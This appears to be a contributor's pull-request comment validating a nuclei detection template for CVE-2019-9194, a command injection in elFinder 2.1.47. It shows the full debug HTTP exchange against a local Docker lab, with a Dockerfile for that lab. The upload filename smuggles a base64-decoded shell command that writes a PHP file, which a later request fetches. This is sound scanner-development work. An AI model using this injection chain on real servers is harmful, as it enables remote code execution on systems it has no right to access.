I’ve validated this template locally?
/claim 12288
debug:
❯ ./nuclei -duc -t nuclei-templates/http/cves/2019/CVE-2019-9194.yaml -target http://127.0.0.1:8000 -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.2
projectdiscovery.io
[INF] Current nuclei version: v3.4.2 (outdated)
[INF] Current nuclei-templates version: v10.2.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 42
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2019-9194] Dumped HTTP request for http://127.0.0.1:8000/php/connector.minimal.php
POST /php/connector.minimal.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Content-Length: 771
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Accept-Encoding: gzip
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="cmd"
upload
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="target"
l1_Lw
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="upload[]"; filename="wsnyks.jpeg;echo PD9waHAgZWNobyBtZDUoJ3h2b3ppdScpO3VubGluayhfX0ZJTEVfXyk7Pz4= | base64 -d > xvoziu.php;echo wsnyks.jpeg"
Content-Type: image/jpeg
����JFIF``��8Photoshop 3.08BIMt��;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82
��C
!'"#%%%),($+!$%$��C $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$��"��
------WebKitFormBoundary7MA4YWxkTrZu0gW--
[DBG] [CVE-2019-9194] Dumped HTTP response http://127.0.0.1:8000/php/connector.minimal.php
HTTP/1.1 200 OK
Connection: close
Content-Length: 1816
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: application/json; charset=utf-8
Date: Tue, 10 Jun 2025 06:46:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=03esq0iud4u5c6o0op3ahcdes3; path=/
{"added":[{"isowner":false,"ts":1749537990,"mime":"image\/jpeg","read":1,"write":1,"size":"284","hash":"l1_d3NueWtzLmpwZWc7ZWNobyBQRDl3YUhBZ1pXTm9ieUJ0WkRVb0ozaDJiM3BwZFNjcE8zVnViR2x1YXloZlgwWkpURVZmWHlrN1B6ND0gfCBiYXNlNjQgLWQgPiB4dm96aXUucGhwO2VjaG8gd3NueWtzLmpwZWc","name":"wsnyks.jpeg;echo PD9waHAgZWNobyBtZDUoJ3h2b3ppdScpO3VubGluayhfX0ZJTEVfXyk7Pz4= | base64 -d > xvoziu.php;echo wsnyks.jpeg","phash":"l1_Lw","tmb":1,"url":"\/php\/..\/files\/wsnyks.jpeg%3Becho%20PD9waHAgZWNobyBtZDUoJ3h2b3ppdScpO3VubGluayhfX0ZJTEVfXyk7Pz4%3D%20%7C%20base64%20-d%20%3E%20xvoziu.php%3Becho%20wsnyks.jpeg"}],"removed":[],"changed":[{"isowner":false,"ts":1749537729,"mime":"directory","read":1,"write":1,"size":0,"hash":"l1_Lw","name":"files","rootRev":"","options":{"path":"","url":"\/php\/..\/files\/","tmbUrl":"\/php\/..\/files\/.tmb\/","disabled":["chmod"],"separator":"\/","copyOverwrite":1,"uploadOverwrite":1,"uploadMaxSize":9223372036854775807,"uploadMaxConn":3,"uploadMime":{"firstOrder":"deny","allow":["image\/x-ms-bmp","image\/gif","image\/jpeg","image\/png","image\/x-icon","text\/plain"],"deny":["all"]},"dispInlineRegex":"^(?:(?:video|audio)|image\/(?!.+\\+xml)|application\/(?:ogg|x-mpegURL|dash\\+xml)|(?:text\/plain|application\/pdf)$)","jpgQuality":100,"archivers":{"create":["application\/x-tar","application\/x-gzip","application\/x-bzip2","application\/zip"],"extract":["application\/x-tar","application\/x-gzip","application\/x-bzip2","application\/zip"],"createext":{"application\/x-tar":"tar","application\/x-gzip":"tgz","application\/x-bzip2":"tbz","application\/zip":"zip"}},"uiCmdMap":[],"syncChkAsTs":1,"syncMinMs":10000,"i18nFolderName":0,"tmbCrop":1,"substituteImg":true,"onetimeUrl":false,"trashHash":"t1_Lw","csscls":"elfinder-navbar-root-local"},"volumeid":"l1_","locked":1,"isroot":1,"phash":""}]}
[INF] [CVE-2019-9194] Dumped HTTP request for http://127.0.0.1:8000/php/connector.minimal.php?target=l1_d3NueWtzLmpwZWc7ZWNobyBQRDl3YUhBZ1pXTm9ieUJ0WkRVb0ozaDJiM3BwZFNjcE8zVnViR2x1YXloZlgwWkpURVZmWHlrN1B6ND0gfCBiYXNlNjQgLWQgPiB4dm96aXUucGhwO2VjaG8gd3NueWtzLmpwZWc°ree=180&mode=rotate&cmd=resize
GET /php/connector.minimal.php?target=l1_d3NueWtzLmpwZWc7ZWNobyBQRDl3YUhBZ1pXTm9ieUJ0WkRVb0ozaDJiM3BwZFNjcE8zVnViR2x1YXloZlgwWkpURVZmWHlrN1B6ND0gfCBiYXNlNjQgLWQgPiB4dm96aXUucGhwO2VjaG8gd3NueWtzLmpwZWc°ree=180&mode=rotate&cmd=resize HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_17) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Connection: close
Cookie: PHPSESSID=03esq0iud4u5c6o0op3ahcdes3
Accept-Encoding: gzip
[DBG] [CVE-2019-9194] Dumped HTTP response http://127.0.0.1:8000/php/connector.minimal.php?target=l1_d3NueWtzLmpwZWc7ZWNobyBQRDl3YUhBZ1pXTm9ieUJ0WkRVb0ozaDJiM3BwZFNjcE8zVnViR2x1YXloZlgwWkpURVZmWHlrN1B6ND0gfCBiYXNlNjQgLWQgPiB4dm96aXUucGhwO2VjaG8gd3NueWtzLmpwZWc°ree=180&mode=rotate&cmd=resize
HTTP/1.1 200 OK
Connection: close
Content-Length: 450
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: application/json; charset=utf-8
Date: Tue, 10 Jun 2025 06:46:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=m37ak50aaui7j529cdvj4m2uip; path=/
{"changed":[{"isowner":false,"ts":1749537990,"mime":"image\/jpeg","read":1,"write":1,"size":"284","hash":"l1_d3NueWtzLmpwZWc7ZWNobyBQRDl3YUhBZ1pXTm9ieUJ0WkRVb0ozaDJiM3BwZFNjcE8zVnViR2x1YXloZlgwWkpURVZmWHlrN1B6ND0gfCBiYXNlNjQgLWQgPiB4dm96aXUucGhwO2VjaG8gd3NueWtzLmpwZWc","name":"wsnyks.jpeg;echo PD9waHAgZWNobyBtZDUoJ3h2b3ppdScpO3VubGluayhfX0ZJTEVfXyk7Pz4= | base64 -d > xvoziu.php;echo wsnyks.jpeg","phash":"l1_Lw","tmb":1,"width":262,"height":192}]}
[INF] [CVE-2019-9194] Dumped HTTP request for http://127.0.0.1:8000/php/xvoziu.php
GET /php/xvoziu.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.20
Connection: close
Cookie: PHPSESSID=m37ak50aaui7j529cdvj4m2uip
Accept-Encoding: gzip
[DBG] [CVE-2019-9194] Dumped HTTP response http://127.0.0.1:8000/php/xvoziu.php
HTTP/1.1 200 OK
Connection: close
Content-Length: 32
Content-Type: text/html; charset=UTF-8
Date: Tue, 10 Jun 2025 06:46:30 GMT
Server: Apache/2.4.29 (Ubuntu)
1e69dd366e96d7d51e23d619cb9f487b
[CVE-2019-9194:word-3] [http] [critical] http://127.0.0.1:8000/php/xvoziu.php
[CVE-2019-9194:word-1] [http] [critical] http://127.0.0.1:8000/php/xvoziu.php
[CVE-2019-9194:status-2] [http] [critical] http://127.0.0.1:8000/php/xvoziu.php
Dockefile:
FROM ubuntu:18.04
LABEL maintainer="r00tuser111"
ARG DEBIAN_FRONTEND=noninteractive
RUN set -ex \
&& apt-get update \
&& apt-get install -y --no-install-recommends \
apache2 \
php7.2 \
php7.2-cli \
php7.2-common \
php7.2-curl \
php7.2-gd \
php7.2-json \
php7.2-mbstring \
php7.2-mysql \
php7.2-xml \
libapache2-mod-php7.2 \
unzip \
zip \
curl \
exiftran \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/*
RUN a2enmod php7.2 rewrite
# download elFinder-2.1.47.tar.gz
RUN set -ex \
&& cd /var/www/html/ \
&& curl -sSL https://github.com/Studio-42/elFinder/archive/2.1.47.tar.gz | tar --strip-components 1 -xz
RUN set -ex \
&& cd /var/www/html/ \
&& mv ./php/connector.minimal.php-dist ./php/connector.minimal.php \
&& cp elfinder.html index.html \
&& chown www-data:www-data -R ./
EXPOSE 80
CMD ["apache2ctl", "-D", "FOREGROUND"]
build Mirror
docker build -t elfinder-2.1.47 .
run
docker run -p 8000:80 elfinder-2.1.47
r00tuser
@r00tuser111
ProjectDiscovery
@projectdiscovery